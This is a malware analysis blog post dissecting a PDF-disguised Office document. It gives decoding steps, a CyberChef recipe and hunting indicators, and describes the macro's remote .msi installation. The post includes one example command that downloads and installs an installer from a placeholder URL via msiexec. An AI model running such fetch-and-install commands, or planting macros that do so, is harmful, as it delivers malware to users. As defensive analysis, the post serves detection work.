[Mal Series #26] Quick Analysis on Maldoc in PDF

Sep 1, 2023

I recently came across the JPCERT/CC blog post about MalDoc in PDF, which I found quite interesting, so I took the sample and started analyzing it. This post shares my analysis and an interesting artifact that is left behind when the maldoc initiates an internet connection to the next-stage URL.

It is recommended to read through their blog post first for a better understanding of the file structure.

Analysis

Thanks to Will Dormann's X post, which mentioned that the link tag with the rel attribute Edit-Time-Data points to a base64-encoded ActiveMime blob. This is a good place to begin the analysis.

In the malicious sample, the string in the link tag with the rel attribute Edit-Time-Data has been URL-encoded. The decoded URL string leads to a .jpg file.
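The lookup described above can be sketched in Python. This is a minimal sketch, not the exact tooling used in this analysis: the function name find_edit_time_data_hrefs is hypothetical, and the optional "3D" after "=" is an assumption that the HTML part may still be quoted-printable encoded (where "=" is written as "=3D").

```python
import re
from urllib.parse import unquote

# Matches a <link> tag whose rel attribute is Edit-Time-Data.
# The optional "3D" tolerates quoted-printable text (assumption).
LINK_RE = re.compile(
    r'<link\b[^>]*\brel\s*=\s*(?:3D)?["\']?Edit-Time-Data["\']?[^>]*>',
    re.IGNORECASE,
)
# Captures the href value inside a matched tag.
HREF_RE = re.compile(r'\bhref\s*=\s*(?:3D)?["\']?([^"\'\s>]+)', re.IGNORECASE)


def find_edit_time_data_hrefs(html_text: str) -> list[str]:
    """Return the URL-decoded href of every Edit-Time-Data link tag."""
    hrefs = []
    for tag in LINK_RE.finditer(html_text):
        match = HREF_RE.search(tag.group(0))
        if match:
            # unquote() turns %XX escapes back into characters.
            hrefs.append(unquote(match.group(1)))
    return hrefs
```

Feeding it the text of the document should return the decoded path of the part that holds the payload. An href that genuinely starts with "3D" would lose those two characters, so treat the result as a triage hint only.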

Following the .jpg file, there is a large chunk of base64 data that is bloated with CRLF (0x0d 0x0a) and spaces (0x20). This looks suspicious because the other content parts are base64-encoded too, yet none of them show this anomalous pattern.

To isolate this chunk and strip the filler bytes, we can hex dump the content and pass it to CyberChef or your own script to clean up the data.

After cleaning the file and base64-decoding it, the ActiveMime magic header appears right away, which caught my attention.
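For those who prefer a script over CyberChef, the cleanup and decode step might look like the following. It is a minimal sketch: the function names are hypothetical, and it assumes the input is only the bloated base64 chunk, already carved out of the file.

```python
import base64
import re


def decode_bloated_base64(raw: bytes) -> bytes:
    """Strip CR, LF and spaces from a base64 blob, then decode it."""
    cleaned = re.sub(rb"[\r\n ]+", b"", raw)
    # Re-add padding in case it was lost while carving the chunk.
    cleaned += b"=" * (-len(cleaned) % 4)
    # validate=True raises on any leftover non-base64 character
    # instead of silently skipping it.
    return base64.b64decode(cleaned, validate=True)


def looks_like_activemime(data: bytes) -> bool:
    """Check for the ActiveMime magic at the start of the decoded data."""
    return data.startswith(b"ActiveMime")
```

Using strict validation after the explicit cleanup is a deliberate choice here: if anything other than CRLF and spaces was mixed into the blob, the decode fails loudly rather than producing corrupted output.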

A quick Google search for the ActiveMime string led me to this blog post from xpnsec, which describes a way to deal with this kind of file. This time I will just re-implement that solution in CyberChef.

Basically, just remove the first 50 bytes of the base64-decoded data (the part that starts with the ActiveMime magic header) and zlib-decompress the rest.
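The same step can be sketched in Python with the standard zlib module. The 50-byte offset is the one used in this analysis and may differ in other samples, so it is kept as a parameter. The function name is hypothetical, and the OLE magic check is an extra sanity check added for this sketch.

```python
import zlib

ACTIVEMIME_HEADER_LEN = 50  # offset used for this sample; may vary elsewhere
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE compound file signature


def extract_ole_from_activemime(
    blob: bytes, header_len: int = ACTIVEMIME_HEADER_LEN
) -> bytes:
    """Drop the ActiveMime header and zlib-decompress the remainder."""
    if not blob.startswith(b"ActiveMime"):
        raise ValueError("blob does not start with the ActiveMime magic")
    ole = zlib.decompress(blob[header_len:])
    if not ole.startswith(OLE_MAGIC):
        raise ValueError("decompressed data is not an OLE compound file")
    return ole
```

If zlib.decompress raises zlib.error, the offset is probably wrong for that sample, and it may be worth searching the blob for the start of the zlib stream instead.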

A successful decompression gives us an OLE file, which can be saved and then fully string-dumped with oledump.py from Didier Stevens.

According to the VBA macro code in the dump, once the user opens the document it calls the Windows Installer function InstallProduct to download and install an .msi installer file from a remote site (there is usually a warning before macros are enabled, so it won't execute directly 😌).

The InstallProduct VBA function is equivalent to running msiexec.exe:

msiexec.exe /i https://server/share/package.msi
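When triaging the string dump, a quick search for .msi URLs can help surface the next-stage location. The sketch below is only an illustration: the function name and the regular expression are my own assumptions, and it will miss URLs that the macro builds at runtime or obfuscates.

```python
import re

# http(s) URLs that end in .msi; stops at whitespace, quotes and angle brackets.
MSI_URL_RE = re.compile(r"https?://[^\s\"'<>]+?\.msi\b", re.IGNORECASE)


def find_msi_urls(text: str) -> list[str]:
    """Return the unique .msi URLs found in text, in order of appearance."""
    seen = []
    for url in MSI_URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return seen
```

The input is expected to be the decoded macro source or string dump saved as text, for example the output of oledump.py redirected to a file.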

Interesting Artifact

Interestingly, MS Office generates a CreateFile event on the C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86 folder path, and that path contains the full URL of the next-stage payload. It seems the folder is used to store the .msi file for installation.

Next Stage URL Found In File Path

Since the sample was running within a closed network, no further events were observed after that. I therefore tried to simulate the behavior with msiexec.exe and a legitimate .msi URL to capture the full sequence of events.

Running msiexec.exe on a random .msi file (in this case orca.msi) shows a similar URL pattern in the default download path.

According to Microsoft:

If the installation database is at a URL, the installer downloads the database to a cache location before starting the installation.
The cache location is %windir%\installer, which is a system-protected folder.

Once the machine starts receiving orca.msi from the target URL successfully (when the installation prompt is shown), the initiating process tries to create a copy of the .msi file under what looks like a hashed file name (in this case 77f4f0.msi) in the cache folder. However, no actual file has been created in the cache folder at this point.

The PID changes after the user clicks the Install button of the .msi file.

The 77f4f0.msi file is created after the Install button is clicked, when the installer starts dropping all its files onto the machine.

Besides these behavioral indicators, we can also look for any file with a .doc extension (but not limited to that) that is identified as a PDF file and creates an outbound connection to a suspicious URL.

These artifacts can be good indicators when hunting for suspicious .msi URL download activity.
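The file-type mismatch part of that check can be sketched as below. It only covers the static side (an Office extension on a file that carries the PDF magic) and not the outbound connection, which needs network or EDR telemetry. The extension list and the function name are hypothetical, and scanning the first 1024 bytes is an assumption based on how leniently PDF readers locate the header.

```python
from pathlib import Path

# Hypothetical, non-exhaustive list of extensions that open in MS Office.
OFFICE_EXTENSIONS = {".doc", ".docx", ".docm", ".dot", ".rtf", ".xls"}


def is_pdf_disguised_as_office(path) -> bool:
    """True if the file has an Office extension but contains a PDF header."""
    path = Path(path)
    if path.suffix.lower() not in OFFICE_EXTENSIONS:
        return False
    with path.open("rb") as fh:
        head = fh.read(1024)
    # Look for the PDF magic anywhere in the first 1024 bytes (assumption).
    return b"%PDF-" in head
```

A hit is only a lead for further triage, since the check says nothing about whether the file actually embeds a macro-enabled document.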

References

https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html

https://blog.xpnsec.com/apt32-phishing-malware/

https://twitter.com/wdormann/status/1696197904262742370

https://learn.microsoft.com/en-us/dotnet/api/system.environment.specialfolder?view=net-7.0

CyberChef recipe to decode the suspicious base64 payload

Find_/_Replace({'option':'Regex','string':'(0D 0A |20)'},'',true,false,true,false)
From_Hex('Auto')
From_Base64('A-Za-z0-9+/=',true,false)
Drop_bytes(0,50,false)
Zlib_Inflate(0,0,'Adaptive',false,false)
To_Hexdump(16,false,false,false)


Written by GhouLSec
